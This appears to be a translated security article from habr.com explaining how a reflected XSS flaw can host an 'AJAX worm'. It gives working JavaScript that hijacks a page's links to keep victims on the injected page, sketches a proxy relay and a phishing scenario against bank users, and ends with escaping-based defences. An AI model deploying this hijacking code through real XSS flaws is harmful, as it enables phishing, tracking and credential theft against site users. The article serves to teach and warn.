
One step from a reflected ("passive") XSS vulnerability to an AJAX worm

I often run into the opinion that a reflected XSS vulnerability poses no great danger and is nothing to worry about. And while this is partly true (compared with other, more catastrophic bugs), the ability to run your own code on a vulnerable site, even when it takes significant extra effort to trick the user, can lead to serious consequences, in particular the complete interception of the user's subsequent actions.

What is an AJAX worm?


An AJAX worm is JavaScript code that modifies the links on the page it lives on so that when the user follows them he stays in the context of the current page: full page navigation is replaced with AJAX requests. In its simplest form it fits in a few lines and works as follows.

1. Collect all the links on the page
2. Attach the worm's own click handler to each of them
3. On click, perform an AJAX request to the clicked link's address
4. Replace the page content with the result obtained in step 3
5. Infect the links in the new content

Clearly this is a very simplified scenario: a full-fledged "combat" worm would also keep the page title up to date, reattach the CSS and JS files referenced in the header, and, where possible, exploit URL spoofing in browsers that allow it. But even the simplest variant, which dumps the fetched markup straight into the body element, works quite well. An example implementation:
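A minimal sketch of the steps above in browser JavaScript (the helper names here are illustrative, not from the original article):

```javascript
// Pure helper: decide whether a link should be hijacked. Skips empty
// hrefs, in-page anchors, javascript: pseudo-links, and cross-origin
// targets that a plain AJAX request could not read anyway.
function shouldHijack(href, origin) {
  if (!href || href.startsWith("#") || href.startsWith("javascript:")) return false;
  try {
    return new URL(href, origin).origin === origin;
  } catch {
    return false;
  }
}

// Steps 1-5 from the list above: grab the links, attach a handler,
// fetch the target via AJAX, swap the body, re-infect the new content.
function infect(doc) {
  for (const a of doc.querySelectorAll("a")) {
    if (!shouldHijack(a.getAttribute("href"), doc.location.origin)) continue;
    a.addEventListener("click", async (e) => {
      e.preventDefault();                 // step 2-3: stay on the current page
      const resp = await fetch(a.href);   // step 3: AJAX request to the link
      doc.body.innerHTML = await resp.text(); // step 4: crude content swap
      infect(doc);                        // step 5: infect the new links
    });
  }
}

// infect(document);  // entry point once the code is injected into a page
```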
A small digression: if a browser script could fetch an arbitrary page from anywhere on the network, the security problem would be far more serious; fortunately, all modern browsers forbid cross-site requests. But even this can be circumvented by sending requests to an intermediate application hosted on the same domain as the page with the worm, which acts as a content relay.


In the simplest case this application is a single line of PHP. A combat-ready version should at least cache the downloaded data so the client never waits for the same content twice, in the ideal case also relay cookies in both directions, and make its requests through a proxy so as not to expose its own IP address in the target site's logs.

Even in this simplest form we get an infected page that lets the user "browse" the web while actually staying on a single page, and, if desired, logs his movements and everything he types. Of course, if the user notices that the page address magically never changes, or that requests to an unfamiliar domain keep appearing in the status bar, he may raise the alarm immediately; but you and I are the clever ones here, while the average user may well overlook it.

Although this technique allows plenty of dirty tricks, it takes too much effort to lure a victim into the trap in the first place, not to mention that such a page would very quickly end up on the browsers' blacklists. But what if the trap turns out to be someone else's page, perfectly safe at first glance, on a domain the user already knows? This is where deploying the code through an XSS vulnerability on another site comes into play.

Imagine a clever attacker running a phishing campaign against a bank's users. He does not need to build any fake websites: it is enough to put a link to the vulnerable page of the real site in the email, and the user, confident that he is visiting a trusted domain, lands in the infected zone. And what he sees there need not be, say, the site search page at all: JavaScript can modify the content arbitrarily, so the user can be shown the index page or any other page.

Moreover, the attacker can dispense with the relay layer entirely, because the requested pages live on the same domain and can be fetched with a direct AJAX request. Alternatively, he can route navigation through the same vulnerable page to make the infection less visible, since that produces real transitions between pages; the target link can then be encoded, for example, as an anchor in the URL.
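One possible reading of the anchor trick, as a hypothetical sketch: the worm keeps the browser on the vulnerable URL and stores the real target after the `#`, which changes the address bar without triggering a page load:

```javascript
// Hypothetical fragment-encoding scheme (names are mine, not the article's):
// "#/account/settings" -> "/account/settings"; an empty hash means the root.
function targetFromHash(hash) {
  return hash && hash.length > 1 ? decodeURIComponent(hash.slice(1)) : "/";
}

// In the infected page the worm would then do something like:
//   const page = targetFromHash(location.hash);
//   fetch(page).then(r => r.text())
//              .then(html => { document.body.innerHTML = html; });
// Only the part after '#' ever changes, so no full page load occurs.
```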



So what can be done about all this?


Prevent the XSS vulnerabilities themselves: manual and automated testing, plus frameworks with a correct policy of escaping any data that comes from outside.
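For illustration, a minimal sketch of the kind of escaping such a framework applies (the helper name is mine): encoding user-controlled text before it reaches the HTML makes injected markup render as text instead of executing.

```javascript
// Replace the five HTML-significant characters with entities so that
// user input placed into markup cannot open or close tags.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}
```

Note that the ampersand must be replaced first, or the entities produced by the later replacements would be escaped twice.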

From the moment the attacker injects his code into a page of the site, we have lost control completely: any protective scripts can be stripped out of the code, and the data the user enters can be sent to a third-party server. The only half-measure is a fixed address for the login page combined with the login script checking the referrer and the sender's IP address; this can stop the attacker from getting into the system automatically, though it will not stop him from using the stolen credentials himself.

Source: https://habr.com/ru/post/74127/

